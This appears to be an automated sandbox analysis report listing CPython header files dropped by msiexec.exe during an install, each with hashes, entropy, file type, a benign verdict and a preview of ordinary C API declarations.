                                                                                                                                SSDEEP:12:BOpgldiy2tuYrCJLrox9tLZI/ncGEWKMS5nHqG+ua5X8PzF8waXQijYab:0W3/2sH6x9tNcE2CnKG/koF8zoab
                                                                                                                                MD5:D9ACFD7588D27CD7ADD94E90C8E30993
                                                                                                                                SHA1:BFCD7266E9E79B5792E705BD52DD46DE5705A48C
                                                                                                                                SHA-256:FFBF2A43E05699C1B0C80CBBFE60E649BF329EEC7B8E0D38E5CA59A29CD3600C
                                                                                                                                SHA-512:45F52C754A90508372F148D4C897A948CB3D2C330B5974BC3066595E26F874C09E0EABB69FB2707324358D855F8B5EBD02E77966BA825849CE21812EA1AB16EA
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ODICTOBJECT_H..#define Py_ODICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....../* OrderedDict */../* This API is optional and mostly redundant. */....#ifndef Py_LIMITED_API....typedef struct _odictobject PyODictObject;....PyAPI_DATA(PyTypeObject) PyODict_Type;..PyAPI_DATA(PyTypeObject) PyODictIter_Type;..PyAPI_DATA(PyTypeObject) PyODictKeys_Type;..PyAPI_DATA(PyTypeObject) PyODictItems_Type;..PyAPI_DATA(PyTypeObject) PyODictValues_Type;....#define PyODict_Check(op) PyObject_TypeCheck(op, &PyODict_Type)..#define PyODict_CheckExact(op) Py_IS_TYPE(op, &PyODict_Type)..#define PyODict_SIZE(op) PyDict_GET_SIZE((op))....PyAPI_FUNC(PyObject *) PyODict_New(void);..PyAPI_FUNC(int) PyODict_SetItem(PyObject *od, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyODict_DelItem(PyObject *od, PyObject *key);..../* wrappers around PyDict* functions */..#define PyODict_GetItem(od, key) PyDict_GetItem(_PyObject_CAST(od), key)..#define PyODict_GetItemWithError(od, key) \.. PyDict_Get
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):877
                                                                                                                                Entropy (8bit):5.264596463537337
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:UPpna5ooK5reGc4q4rCJ/2p2p2I4SpdR9p0zFnCp1ep5wyKZDBpsPpQ/6EjZpuV8:Z5XKc4sFGl3Od//6l/Ul
                                                                                                                                MD5:6A936E7FB222A67C334F6DD6E547E757
                                                                                                                                SHA1:CAC4D38A2D8665E8A0807AA3C7E7DD4C52A400DF
                                                                                                                                SHA-256:90327D76CC64A5E375660143050FACB3AA59422B983E57C6624D0F92B9812785
                                                                                                                                SHA-512:A7A40EC0DA0D8FAB3909AB430CD4CB9008BC0256AC0A3EC6B8089F7A4008C2A3D2C926DC612A3C5EF7DD642CCDBF0AC1BC89AAC71EE38D3847F7506CD653460E
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* PickleBuffer object. This is built-in for ease of use from third-party.. * C extensions... */....#ifndef Py_PICKLEBUFOBJECT_H..#define Py_PICKLEBUFOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_LIMITED_API....PyAPI_DATA(PyTypeObject) PyPickleBuffer_Type;....#define PyPickleBuffer_Check(op) Py_IS_TYPE(op, &PyPickleBuffer_Type)..../* Create a PickleBuffer redirecting to the given buffer-enabled object */..PyAPI_FUNC(PyObject *) PyPickleBuffer_FromObject(PyObject *);../* Get the PickleBuffer's underlying view to the original object.. * (NULL if released).. */..PyAPI_FUNC(const Py_buffer *) PyPickleBuffer_GetBuffer(PyObject *);../* Release the PickleBuffer. Returns 0 on success, -1 on error. */..PyAPI_FUNC(int) PyPickleBuffer_Release(PyObject *);....#endif /* !Py_LIMITED_API */....#ifdef __cplusplus..}..#endif..#endif /* !Py_PICKLEBUFOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3593
                                                                                                                                Entropy (8bit):4.90105688574451
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Ul3OVclerU8SXnA9mpbB0CD0cEQx9BX4GRm461PbVX58TXsDzz:UZOVcBB7IcEQx9BX4GRm46nGXsT
                                                                                                                                MD5:5042956670A8ECA4C543D14B62A8063C
                                                                                                                                SHA1:A023CB5E91870D50CD1222D5F0DDF90EBD408E6A
                                                                                                                                SHA-256:125515BD49C0BBEFBE7B9A4219EE0F671C70E5E8052277DD1BBB00E08DA76F8F
                                                                                                                                SHA-512:7A8795E604886B6C344CAD2596872149B1346A8DE86B86063DCB3F258F8D744502B9D94E501723390FA074B06DBDACC4A7FF7079DB022CF8B9A16A40D827C50E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PTRHEAD_STUBS_H..#define Py_CPYTHON_PTRHEAD_STUBS_H....#if !defined(HAVE_PTHREAD_STUBS)..# error "this header file requires stubbed pthreads."..#endif....#ifndef _POSIX_THREADS..# define _POSIX_THREADS 1..#endif..../* Minimal pthread stubs for CPython... *.. * The stubs implement the minimum pthread API for CPython... * - pthread_create() fails... * - pthread_exit() calls exit(0)... * - pthread_key_*() functions implement minimal TSS without destructor... * - all other functions do nothing and return 0... */....#ifdef __wasi__..// WASI's bits/alltypes.h provides type definitions when __NEED_ is set...// The header file can be included multiple times...# define __NEED_pthread_cond_t 1..# define __NEED_pthread_condattr_t 1..# define __NEED_pthread_mutex_t 1..# define __NEED_pthread_mutexattr_t 1..# define __NEED_pthread_key_t 1..# define __NEED_pthread_t 1..# define __NEED_pthread_attr_t 1..# include <bits/alltypes.h>..#else..typedef struct { void *__x; } pth
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1426
                                                                                                                                Entropy (8bit):5.414626346930993
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:oUIMUhanrrI1lE2gM6CS5XphKLPIQIG8ImINPxIBIsI2fBAv2Er1ZW:EMUhannI1lEkuXsIQILImIN5IBIsIgB5
                                                                                                                                MD5:91891583393561856B0C66D384A1B6E9
                                                                                                                                SHA1:6816BAB590022535ED637B1A7FAD8A5DD4C8B33F
                                                                                                                                SHA-256:5B0CF2697E86E054D0A0721670D0A8E0318ED9ACB05EA0E93CD543E263F2F97A
                                                                                                                                SHA-512:616949A2566F0FEB26C12B2106A3BBFA1CF8BFC8686E75CAE0A5DF679626A06FD7A83364DC4D908993CF12AA300A75A0EE87496A7B66EF7B165369470B06CC03
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef PYCTYPE_H..#define PYCTYPE_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_CTF_LOWER 0x01..#define PY_CTF_UPPER 0x02..#define PY_CTF_ALPHA (PY_CTF_LOWER|PY_CTF_UPPER)..#define PY_CTF_DIGIT 0x04..#define PY_CTF_ALNUM (PY_CTF_ALPHA|PY_CTF_DIGIT)..#define PY_CTF_SPACE 0x08..#define PY_CTF_XDIGIT 0x10....PyAPI_DATA(const unsigned int) _Py_ctype_table[256];..../* Unlike their C counterparts, the following macros are not meant to.. * handle an int with any of the values [EOF, 0-UCHAR_MAX]. The argument.. * must be a signed/unsigned char. */..#define Py_ISLOWER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_LOWER)..#define Py_ISUPPER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_UPPER)..#define Py_ISALPHA(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_ALPHA)..#define Py_ISDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_DIGIT)..#define Py_ISXDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_XDIGIT)..#define Py_ISALNUM(c) (_Py_ctype_table[Py_C
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1111
                                                                                                                                Entropy (8bit):5.218228173567148
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BCJBreigcG+CjJsJwWGTjvFXATYwVcCzfJrcK52u5vniLgtra:ohgcgjJsiWMvNAlOgxcKkudUg8
                                                                                                                                MD5:84AB817AD2DFEFAC893140ABB2925DAB
                                                                                                                                SHA1:E9E85AE5A513F43878CB15DEFC92A68DB605365B
                                                                                                                                SHA-256:6C11567ACE9A08F4E6AD0D5EC9C036A05D7ABC02F725EBC52F6FEB7FF690E184
                                                                                                                                SHA-512:CDDD20D1C11135A5338C5BB71657FD68FA22F258004CFD7FB02E6BC7DFF555A2F43B221FA7B3F702EA16239D76094D87BF4CA77870EFA14D069AD9F08A4471C7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_PYDEBUG_H..#define Py_PYDEBUG_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(int) Py_DebugFlag;..PyAPI_DATA(int) Py_VerboseFlag;..PyAPI_DATA(int) Py_QuietFlag;..PyAPI_DATA(int) Py_InteractiveFlag;..PyAPI_DATA(int) Py_InspectFlag;..PyAPI_DATA(int) Py_OptimizeFlag;..PyAPI_DATA(int) Py_NoSiteFlag;..PyAPI_DATA(int) Py_BytesWarningFlag;..PyAPI_DATA(int) Py_FrozenFlag;..PyAPI_DATA(int) Py_IgnoreEnvironmentFlag;..PyAPI_DATA(int) Py_DontWriteBytecodeFlag;..PyAPI_DATA(int) Py_NoUserSiteDirectory;..PyAPI_DATA(int) Py_UnbufferedStdioFlag;..PyAPI_DATA(int) Py_HashRandomizationFlag;..PyAPI_DATA(int) Py_IsolatedFlag;....#ifdef MS_WINDOWS..PyAPI_DATA(int) Py_LegacyWindowsFSEncodingFlag;..PyAPI_DATA(int) Py_LegacyWindowsStdioFlag;..#endif..../* this is a wrapper around getenv() that pays attention to.. Py_IgnoreEnvironmentFlag. It should be used for getting variables like.. PYTHONPATH and PYTHONHOME from the environment */..PyAPI_DATA(char*) Py_GETENV
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4701
                                                                                                                                Entropy (8bit):5.02458033390323
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dHcbckGrBZcmQ4xTmCHijFLdkqtGe5W5CpJQCupUDuU2:ObhOZcDcqCHQlx95W5CHQCupUDuU2
                                                                                                                                MD5:E6C09073CBD9DAE768241265D71BAFD4
                                                                                                                                SHA1:F063B0BEAED4CB42501E6E853680ACAC03CB1E13
                                                                                                                                SHA-256:8346CFD3BE64D2D30025E8E842544B04BBB319D6ED14D7739D0DE9C1D858ADF0
                                                                                                                                SHA-512:D1D35A322A6283EEE9C8A03349B871CF7CFE89186833A9D5325900C7F003C7D3CB3A309E367AFBE01A132711B200F98A48BDC3007283215AB56C4EA891AD3AC1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_ERRORS_H..# error "this header file must not be included directly"..#endif..../* Error objects */..../* PyException_HEAD defines the initial segment of every exception class. */..#define PyException_HEAD PyObject_HEAD PyObject *dict;\.. PyObject *args; PyObject *notes; PyObject *traceback;\.. PyObject *context; PyObject *cause;\.. char suppress_context;....typedef struct {.. PyException_HEAD..} PyBaseExceptionObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *excs;..} PyBaseExceptionGroupObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *filename;.. PyObject *lineno;.. PyObject *offset;.. PyObject *end_lineno;.. PyObject *end_offset;.. PyObject *text;.. PyObject *print_file_and_line;..} PySyntaxErrorObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *name;.. PyObject *path;..} PyImportErrorObject;....typedef
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):459
                                                                                                                                Entropy (8bit):5.152600348696546
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BemmYxSnlF9rrCJp5NA1Jocl4WWWVsE2I0cD:LmYMMLA1xhWTjI0cD
                                                                                                                                MD5:BBC7515EBD44C181429DE06707AA39E0
                                                                                                                                SHA1:3948330184B82E3BFB6390D0740B1F43A67CA1DD
                                                                                                                                SHA-256:B8B42E4F39DBC5F267E8E1FF0C4A52B431A422E6CB58C2380826A0C478334316
                                                                                                                                SHA-512:A4E6AF8F865B45A81D842558277382FFF5357EC6B97ABBBB5D6AC2D25942EEFACF321CE58615A3112D799CECD4AE9AB32CAE6D1B725A92A40797D2FD80C9622A
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_PYFPE_H..#define Py_PYFPE_H../* Header excluded from the stable API */..#ifndef Py_LIMITED_API..../* These macros used to do something when Python was built with --with-fpectl,.. * but support for that was dropped in 3.7. We continue to define them though,.. * to avoid breaking API users... */....#define PyFPE_START_PROTECT(err_string, leave_stmt)..#define PyFPE_END_PROTECT(v)....#endif /* !defined(Py_LIMITED_API) */..#endif /* !Py_PYFPE_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):599
                                                                                                                                Entropy (8bit):5.067351523010416
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BK/HQxib2EbVruIY6VAnr+mCfnD/XnlKwCfnXXnWCfTm:+wxibxSWidC7/VKwCfmC7m
                                                                                                                                MD5:276E44BC28511B46C6F1ADD674854978
                                                                                                                                SHA1:46B4BF3D0DC72789DC61A937DE64636738786BE9
                                                                                                                                SHA-256:436C999DECD34E7F19663AB054C6381F7FE167FF03FAF36FC910D2814373AC4A
                                                                                                                                SHA-512:0B08D72A122AC7E35E056E2EE81953B5E0D76940A0975B388DD513AB2AF5E9728D61EA0188D57309443DBEC61A74905B89B965136393D2D5404B251EDDC4FC0B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYFRAME_H..# error "this header file must not be included directly"..#endif....PyAPI_DATA(PyTypeObject) PyFrame_Type;....#define PyFrame_Check(op) Py_IS_TYPE((op), &PyFrame_Type)....PyAPI_FUNC(PyFrameObject *) PyFrame_GetBack(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetLocals(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGlobals(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetBuiltins(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGenerator(PyFrameObject *frame);..PyAPI_FUNC(int) PyFrame_GetLasti(PyFrameObject *frame);....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2164
                                                                                                                                Entropy (8bit):5.16165198392057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:PcgTHHiDGIa4t3zL1D/PWchz/cU/4j/JNU:PcyiDGInzZDPWiDAj/DU
                                                                                                                                MD5:C7715CE2071F47DE91188638BFEB72F5
                                                                                                                                SHA1:FF162A1F9C4D513FF13F167E23FE427A9F643A08
                                                                                                                                SHA-256:DDDC48056855DAF07D30198621051DC8970DF46C773CFAA65919D9A444491D43
                                                                                                                                SHA-512:31A1E6A00056EC18BBD63275E08E9DD53AA3A3CD91A75AFBD960475148658792AE21035EBA9E754C7D767B0136C7515E88466EAB8EF23934A69FCE9CDCFEB254
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYLIFECYCLE_H..# error "this header file must not be included directly"..#endif..../* Py_FrozenMain is kept out of the Limited API until documented and present.. in all builds of Python */..PyAPI_FUNC(int) Py_FrozenMain(int argc, char **argv);..../* Only used by applications that embed the interpreter and need to.. * override the standard encoding determination mechanism.. */..Py_DEPRECATED(3.11) PyAPI_FUNC(int) Py_SetStandardStreamEncoding(.. const char *encoding,.. const char *errors);..../* PEP 432 Multi-phase initialization API (Private while provisional!) */....PyAPI_FUNC(PyStatus) Py_PreInitialize(.. const PyPreConfig *src_config);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromBytesArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. char **argv);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. wchar_t **argv);....PyAPI_FUNC(int) _Py_IsCoreInitialized(void);....../* Initializ
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3477
                                                                                                                                Entropy (8bit):5.1286140259952795
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Wcgj7h1hKfuuw0hiNmpNzTHo7G97yXQLFUuGliSsvQdNZd65liN3q7lcPRsA4G4W:Wc4fwsr8HTwQA1XNZ8z030A4G4ogJy
                                                                                                                                MD5:E5E62995E21FDDB3F0B29DDAC77D7C9C
                                                                                                                                SHA1:ABFE1179761F2E7F714209DD84DE7CD0C2B80C69
                                                                                                                                SHA-256:4471EE830A01532450D95B83003DC2A8319267FB5ABBFBDEA20133DB0E640831
                                                                                                                                SHA-512:512C7A37D6AAF55431746BAD694A0BCF5BEC0D72CAC8FAECD808C8B733DB9A72AB00808E2D21A4DB5E48464FBBB4CF7F4BD75157E66EE7EC3859866408EBDCFD
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYMEM_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void *) PyMem_RawMalloc(size_t size);..PyAPI_FUNC(void *) PyMem_RawCalloc(size_t nelem, size_t elsize);..PyAPI_FUNC(void *) PyMem_RawRealloc(void *ptr, size_t new_size);..PyAPI_FUNC(void) PyMem_RawFree(void *ptr);..../* Try to get the allocators name set by _PyMem_SetupAllocators(). */..PyAPI_FUNC(const char*) _PyMem_GetCurrentAllocatorName(void);..../* strdup() using PyMem_RawMalloc() */..PyAPI_FUNC(char *) _PyMem_RawStrdup(const char *str);..../* strdup() using PyMem_Malloc() */..PyAPI_FUNC(char *) _PyMem_Strdup(const char *str);..../* wcsdup() using PyMem_RawMalloc() */..PyAPI_FUNC(wchar_t*) _PyMem_RawWcsdup(const wchar_t *str);......typedef enum {.. /* PyMem_RawMalloc(), PyMem_RawRealloc() and PyMem_RawFree() */.. PYMEM_DOMAIN_RAW,.... /* PyMem_Malloc(), PyMem_Realloc() and PyMem_Free() */.. PYMEM_DOMAIN_MEM,.... /* PyObject_Malloc(), PyObject_Realloc() and PyO
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14717
                                                                                                                                Entropy (8bit):4.838620226307059
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:dDZ5mvt7gwfBhwb2nU48D84yGdsTR5l0K8oLQxJFDoxSH7fOVXmp40qVIc:ZZ5OBhg2nU4684NiTRL03UxsOVXmXqKc
                                                                                                                                MD5:C7A6B052B9F35C2D06C24B4485B80343
                                                                                                                                SHA1:46EEAC2B4BDE791CE1323E40F0A79FA4576F78BB
                                                                                                                                SHA-256:68C21E78CAD517FADB341E266B386C22C4EB2A8AC75BBF619C73C1ACD6F3D88F
                                                                                                                                SHA-512:312D9CC5ADDEEECB672091D598BCC5E9DA60A34139DE2EE3E69369D1E196B82AAD1E6B2269342E432F1E3543C98D3C013A34D77587B3114A4E0DD6581056EDE6
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYSTATE_H..# error "this header file must not be included directly"..#endif......PyAPI_FUNC(int) _PyInterpreterState_RequiresIDRef(PyInterpreterState *);..PyAPI_FUNC(void) _PyInterpreterState_RequireIDRef(PyInterpreterState *, int);....PyAPI_FUNC(PyObject *) _PyInterpreterState_GetMainModule(PyInterpreterState *);..../* State unique per thread */..../* Py_tracefunc return -1 when raising an exception, or 0 for success. */..typedef int (*Py_tracefunc)(PyObject *, PyFrameObject *, int, PyObject *);..../* The following values are used for 'what' for tracefunc functions.. *.. * To add a new kind of trace event, also update "trace_init" in.. * Python/sysmodule.c to define the Python level event name.. */..#define PyTrace_CALL 0..#define PyTrace_EXCEPTION 1..#define PyTrace_LINE 2..#define PyTrace_RETURN 3..#define PyTrace_C_CALL 4..#define PyTrace_C_EXCEPTION 5..#define PyTrace_C_RETURN 6..#define PyTrace_OPCODE 7......typedef struct {.. PyCodeObject *code; // The cod
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4932
                                                                                                                                Entropy (8bit):5.066785207639736
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:hfcTyk0Vew9T8e7ZkadKI/sTJm2JMQMSoISkZe3+cJ5lh:qTyk0Vew9we76adKI/sT772/5f
                                                                                                                                MD5:336A0FAB02A24600A0B8B513FC305E45
                                                                                                                                SHA1:8DBBA52D927B8A8984C753EDBBA0F49A5A1A03F0
                                                                                                                                SHA-256:293B1A0DBCE799CB6BCD53F5D947D0F3EC97A0446D79F6DE62F621A29BE261A2
                                                                                                                                SHA-512:300DD924DB224B58D3ECB0BCE9CDC31A4B6FE29F545FCCA2760CB832A3C0810051B754BB4BC09CB0432B3EA70197FADDEE22FFA723A5FD1D67B0AD982CE176FB
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYTHONRUN_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyRun_SimpleStringFlags(const char *, PyCompilerFlags *);..PyAPI_FUNC(int) _PyRun_SimpleFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_AnyFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) _PyRun_AnyFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_SimpleFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneObject(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1468
                                                                                                                                Entropy (8bit):5.1184739568883915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:twxibGLeGV9oc9raLUq3oZJM4TNYoZyt0ZqcBZZnRKQBxFCdVK//rxmxyovn:tcgY9gkGIZdTNYoZyt0Z9fNRLPFCdV2w
                                                                                                                                MD5:F1995D4E98C3E9167A5CE7D764F3240B
                                                                                                                                SHA1:AE44E07C00227C214F637A795E02FEB2985589AB
                                                                                                                                SHA-256:D5CBA29AC2A11A7D31296BD43E5262D28919C91FC1BDEDF9D60FECFDC7E100F0
                                                                                                                                SHA-512:382841A57688CA36630A956820370C8C305E0A31D43F1C478CAF864A01618590511B667051D1884A12A1E3A9D8F772F65B0CF6145E1CC29F13ED213AA4051394
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_PYTHREAD_H..# error "this header file must not be included directly"..#endif....#define PYTHREAD_INVALID_THREAD_ID ((unsigned long)-1)....#ifdef HAVE_FORK../* Private function to reinitialize a lock at fork in the child process... Reset the lock to the unlocked state... Return 0 on success, return -1 on error. */..PyAPI_FUNC(int) _PyThread_at_fork_reinit(PyThread_type_lock *lock);..#endif /* HAVE_FORK */....#ifdef HAVE_PTHREAD_H.. /* Darwin needs pthread.h to know type name the pthread_key_t. */..# include <pthread.h>..# define NATIVE_TSS_KEY_T pthread_key_t..#elif defined(NT_THREADS).. /* In Windows, native TSS key type is DWORD,.. but hardcode the unsigned long to avoid errors for include directive... */..# define NATIVE_TSS_KEY_T unsigned long..#elif defined(HAVE_PTHREAD_STUBS)..# include "cpython/pthread_stubs.h"..# define NATIVE_TSS_KEY_T pthread_key_t..#else..# error "Require native threads. See https://bugs.python.o
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12481
                                                                                                                                Entropy (8bit):5.0509041008951945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:CY5n/WWPKCv5HjsWyy5oUpKQbIAPhF48TWO9BSY1Y8Ca:d5eWPKo5HjsTOoUppIAJFfWO31Ca
                                                                                                                                MD5:ACDC88388DC320996EE297CB4F5F732E
                                                                                                                                SHA1:BD2C36B49EA03D8F5BAB74A40C4B56199C31605D
                                                                                                                                SHA-256:3878BBB134710534555F5606E56E113EE8D4CBCF1A7A0578FC77F673EB09EBD0
                                                                                                                                SHA-512:8A65A522B2A7293931801F0F11B3E569D3CEFCA468AAE1A2B68E9F4C8BDE6BEB395DEB4779C64DBAEDB76F3464B67B818E94B5CE84EB3D156392036EDEA10138
                                                                                                                                Malicious:false
                                                                                                                                Preview:// The _PyTime_t API is written to use timestamp and timeout values stored in..// various formats and to read clocks...//..// The _PyTime_t type is an integer to support directly common arithmetic..// operations like t1 + t2...//..// The _PyTime_t API supports a resolution of 1 nanosecond. The _PyTime_t type..// is signed to support negative timestamps. The supported range is around..// [-292.3 years; +292.3 years]. Using the Unix epoch (January 1st, 1970), the..// supported date range is around [1677-09-21; 2262-04-11]...//..// Formats:..//..// * seconds..// * seconds as a floating pointer number (C double)..// * milliseconds (10^-3 seconds)..// * microseconds (10^-6 seconds)..// * 100 nanoseconds (10^-7 seconds)..// * nanoseconds (10^-9 seconds)..// * timeval structure, 1 microsecond resolution (10^-6 seconds)..// * timespec structure, 1 nanosecond resolution (10^-9 seconds)..//..// Integer overflows are detected and raise OverflowError. Conversion to a..// resolution worse than 1 na
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2064
                                                                                                                                Entropy (8bit):4.897064162518879
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:IgwxibGmm9VHaYyoYxMxZUWRtvtNh+p9IHtxAEanHsbz/D4kTqZRuZH/tHFKzvPR:IgcgVVCOiFNh+TyrAefqIFAlUmZH
                                                                                                                                MD5:8CFFA9B6F891AEB2A9A360000A0E64F9
                                                                                                                                SHA1:2D1E71097B2338B87D87EA2AE504275D49B3A04B
                                                                                                                                SHA-256:7155235F4FA1E9D0FD30D90E999EAF603AF2A4CBAD114A95280A35F4502D2BB7
                                                                                                                                SHA-512:F65F9F720239CD50076382EE288B5B3CDEAD93BA7B4DE2C3566B92077832AE31F7C1C7DB0D85ED62B7313363965319D55D1720A7615C07D5C1D6E05F07CD34A9
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_SETOBJECT_H..# error "this header file must not be included directly"..#endif..../* There are three kinds of entries in the table:....1. Unused: key == NULL and hash == 0..2. Dummy: key == dummy and hash == -1..3. Active: key != NULL and key != dummy and hash != -1....The hash field of Unused slots is always zero.....The hash field of Dummy slots are set to -1..meaning that dummy entries can be detected by..either entry->key==dummy or by entry->hash==-1...*/....#define PySet_MINSIZE 8....typedef struct {.. PyObject *key;.. Py_hash_t hash; /* Cached hash code of the key */..} setentry;..../* The SetObject data structure is shared by set and frozenset objects.....Invariant for sets:.. - hash is -1....Invariants for frozensets:.. - data is immutable... - hash is the hash of the frozenset or -1 if not computed yet.....*/....typedef struct {.. PyObject_HEAD.... Py_ssize_t fill; /* Number active and dummy entries*/.. Py_ssize_t us
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):505
                                                                                                                                Entropy (8bit):4.99108483454011
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BSa/HQxib2E5nF36+Iq+JeqlSdd0J+7/vAn7pF:bwxibjlIpidSe6pF
                                                                                                                                MD5:58FECAA2AEB3B93428BEDAD8A547F304
                                                                                                                                SHA1:8150D2BF365DC611ED5EB8E5DBD9FA576285DA94
                                                                                                                                SHA-256:3DE1277A0D20F6C4258AD7B63C6AF9377D8EB2A66667CD1C5709616A1E466CB6
                                                                                                                                SHA-512:8D49D9C0A691922B6B633487EE0EAEBB0368D122B1441959BCAEC745CEE8760C19A60C48DE33F402D18FD4B8916FD7138D20512A98C9B7DF29D8ACC62B9B0FDE
                                                                                                                                Malicious:false
